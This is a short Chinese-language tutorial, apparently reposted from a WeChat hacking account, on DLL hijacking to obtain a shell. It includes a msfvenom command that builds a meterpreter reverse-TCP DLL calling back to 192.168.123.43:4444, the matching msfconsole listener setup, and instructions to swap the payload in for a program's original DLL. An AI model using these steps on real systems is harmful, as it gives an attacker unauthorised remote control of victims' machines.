本文我们简单的介绍一种DLL劫持的方法来获取目标Shell。注意本文仅供学习和研究,坚决反对一切危害网络安全的行为。造成法律后果自负!
什么是DLL
在我们普遍认为,windows下的程序都是exe
文件。其实不然,在windows中很多程序并不是一个完整的exe
。他可能会分割成独立的多个动态链接库
即dll
文件。当我们运行exe文件时,随之相应的dll文件也会调用。
因此,我们可以生成相关的dll
文件,当程序运行时通过调用dll文件从而获得系统shell
。
获取调用的Dll
我们可以利用火绒中自带的工具,火绒剑来查看程序调用的Dll文件都有哪些。
需要注意的是,我们尽量去动用软件自身调用的dll文件,不要动系统的
dll
文件。以免造成系统异常。
生成shell
我们利用msfconsole生成一个dll文件,命令如下:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.123.43 lport=4444 -f dll -o kali.dll

配置监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.123.43
set LPORT 4444
exploit
将原来的文件的dll
文件进行备份。让后将生成的dll文件重命名源文件,进行替换。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):通过劫持Dll文件来获得Shell
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/152340.html